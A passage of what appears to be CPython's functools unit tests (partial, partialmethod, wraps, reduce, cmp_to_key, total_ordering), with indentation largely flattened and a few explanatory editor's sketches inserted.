return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
support.gc_collect() # For PyPy or other GCs.
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
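        # Constructing a partial of a partial is flattened into a single partial,
        # so the nested and flat forms below have identical (func, args, keywords).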
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
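# Editor's note: the sketch below is illustrative only and is not part of the
# original test suite. It shows the basic behaviour the partial tests above
# exercise: a functools.partial object pre-binds positional and keyword
# arguments and exposes them via .func, .args and .keywords.
def _partial_sketch():
    import functools
    base2 = functools.partial(int, base=2)      # pre-bind the keyword argument
    assert base2('1010') == 10                  # same as int('1010', base=2)
    assert base2.func is int
    assert base2.keywords == {'base': 2}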
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
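# Editor's note: illustrative sketch (not part of the original suite) of
# functools.partialmethod, the descriptor counterpart of partial exercised by
# TestPartialMethod above.
def _partialmethod_sketch():
    import functools
    class Cell:
        def set_state(self, state):
            self.state = state
        # behaves like a method with the first argument already bound
        set_alive = functools.partialmethod(set_state, True)
    c = Cell()
    c.set_alive()
    assert c.state is True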
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
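# Editor's note: illustrative sketch (not part of the original suite) showing
# what update_wrapper/wraps copy by default: metadata such as __name__ is
# assigned from the wrapped function and __wrapped__ points back at it.
def _wraps_sketch():
    import functools
    def greet(name):
        """Return a greeting."""
        return 'hello ' + name
    @functools.wraps(greet)
    def wrapper(*args, **kwargs):
        return greet(*args, **kwargs)
    assert wrapper.__name__ == 'greet'          # assigned from the wrapped function
    assert wrapper.__wrapped__ is greet         # back-reference added by update_wrapper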
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be an empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
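# Editor's note: illustrative sketch (not part of the original suite) of the
# reduce() semantics tested above: the function is applied cumulatively from
# left to right, and the optional initial value seeds the accumulator.
def _reduce_sketch():
    import functools
    import operator
    assert functools.reduce(operator.add, [1, 2, 3, 4]) == 10
    assert functools.reduce(operator.add, [], 42) == 42     # initializer returned for empty input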
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
@support.cpython_only
def test_disallow_instantiation(self):
# Ensure that the type disallows instantiation (bpo-43916)
support.check_disallow_instantiation(
self, type(c_functools.cmp_to_key(None))
)
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
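# Editor's note: illustrative sketch (not part of the original suite) showing
# the typical use of cmp_to_key: adapting an old-style comparison function for
# use as a sorted()/min()/max() key.
def _cmp_to_key_sketch():
    import functools
    def reverse_numeric(x, y):
        return y - x
    result = sorted([5, 2, 4, 1, 3], key=functools.cmp_to_key(reverse_numeric))
    assert result == [5, 4, 3, 2, 1]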
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
